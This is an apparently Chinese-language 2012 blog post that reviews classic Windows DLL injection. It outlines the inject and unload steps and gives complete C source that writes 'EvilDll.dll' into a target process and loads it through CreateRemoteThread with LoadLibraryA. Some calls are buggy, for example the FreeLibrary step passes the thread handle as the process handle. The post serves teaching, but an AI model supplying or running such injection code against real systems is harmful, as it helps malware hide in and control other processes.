Pnig0s1992:算是复习了,最经典的教科书式的Dll注入。
总结一下基本的注入过程,分注入和卸载
注入Dll:
1,OpenProcess获得要注入进程的句柄
2,VirtualAllocEx在远程进程中开辟出一段内存,长度为strlen(dllname)+1;
3,WriteProcessMemory将Dll的名字写入第二步开辟出的内存中。
4,CreateRemoteThread将LoadLibraryA作为线程函数,参数为Dll的名称,创建新线程
5,CloseHandle关闭线程句柄
卸载Dll:
1,CreateRemoteThread将GetModuleHandle注入到远程进程中,参数为被注入的Dll名
2,GetExitCodeThread将线程退出的退出码作为Dll模块的句柄值。
3,CloseHandle关闭线程句柄
3,CreateRemoteThread将FreeLibraryA注入到远程进程中,参数为第二步获得的句柄值。
4,WaitForSingleObject等待对象句柄返回
5,CloseHandle关闭线程及进程句柄。
01.//Code By Pnig0s1992 02.//Date:2012,3,13 03.#include <stdio.h> 04.#include <Windows.h> 05.#include <TlHelp32.h> 06. 07. 08.DWORD getProcessHandle(LPCTSTR lpProcessName)//根据进程名查找进程PID 09.{ 10. DWORD dwRet = 0; 11. HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); 12. if(hSnapShot == INVALID_HANDLE_VALUE) 13. { 14. printf("\n获得进程快照失败%d",GetLastError()); 15. return dwRet; 16. } 17. 18. PROCESSENTRY32 pe32;//声明进程入口对象 19. pe32.dwSize = sizeof(PROCESSENTRY32);//填充进程入口对象大小 20. Process32First(hSnapShot,&pe32);//遍历进程列表 21. do 22. { 23. if(!lstrcmp(pe32.szExeFile,lpProcessName))//查找指定进程名的PID 24. { 25. dwRet = pe32.th32ProcessID; 26. break; 27. } 28. } while (Process32Next(hSnapShot,&pe32)); 29. CloseHandle(hSnapShot); 30. return dwRet;//返回 31.} 32. 33.INT main(INT argc,CHAR * argv[]) 34.{ 35. DWORD dwPid = getProcessHandle((LPCTSTR)argv[1]); 36. LPCSTR lpDllName = "EvilDll.dll"; 37. HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwPid); 38. if(hProcess == NULL) 39. { 40. printf("\n获取进程句柄错误%d",GetLastError()); 41. return -1; 42. } 43. DWORD dwSize = strlen(lpDllName)+1; 44. DWORD dwHasWrite; 45. LPVOID lpRemoteBuf = VirtualAllocEx(hProcess,NULL,dwSize,MEM_COMMIT,PAGE_READWRITE); 46. if(WriteProcessMemory(hProcess,lpRemoteBuf,lpDllName,dwSize,&dwHasWrite)) 47. { 48. if(dwHasWrite != dwSize) 49. { 50. VirtualFreeEx(hProcess,lpRemoteBuf,dwSize,MEM_COMMIT); 51. CloseHandle(hProcess); 52. return -1; 53. } 54. 55. }else 56. { 57. printf("\n写入远程进程内存空间出错%d。",GetLastError()); 58. CloseHandle(hProcess); 59. return -1; 60. } 61. 62. DWORD dwNewThreadId; 63. LPVOID lpLoadDll = LoadLibraryA; 64. HANDLE hNewRemoteThread = CreateRemoteThread(hProcess,NULL,0,(LPTHREAD_START_ROUTINE)lpLoadDll,lpRemoteBuf,0,&dwNewThreadId); 65. if(hNewRemoteThread == NULL) 66. { 67. printf("\n建立远程线程失败%d",GetLastError()); 68. CloseHandle(hProcess); 69. return -1; 70. } 71. 72. WaitForSingleObject(hNewRemoteThread,INFINITE); 73. CloseHandle(hNewRemoteThread); 74. 75. //准备卸载之前注入的Dll 76. DWORD dwHandle,dwID; 77. LPVOID pFunc = GetModuleHandleA;//获得在远程线程中被注入的Dll的句柄 78. HANDLE hThread = CreateRemoteThread(hProcess,NULL,0,(LPTHREAD_START_ROUTINE)pFunc,lpRemoteBuf,0,&dwID); 79. WaitForSingleObject(hThread,INFINITE); 80. GetExitCodeThread(hThread,&dwHandle);//线程的结束码即为Dll模块儿的句柄 81. CloseHandle(hThread); 82. pFunc = FreeLibrary; 83. hThread = CreateRemoteThread(hThread,NULL,0,(LPTHREAD_START_ROUTINE)pFunc,(LPVOID)dwHandle,0,&dwID); //将FreeLibraryA注入到远程线程中去卸载Dll 84. WaitForSingleObject(hThread,INFINITE); 85. CloseHandle(hThread); 86. CloseHandle(hProcess); 87. return 0; 88.}
http://pnig0s1992.blog.51cto.com/393390/804484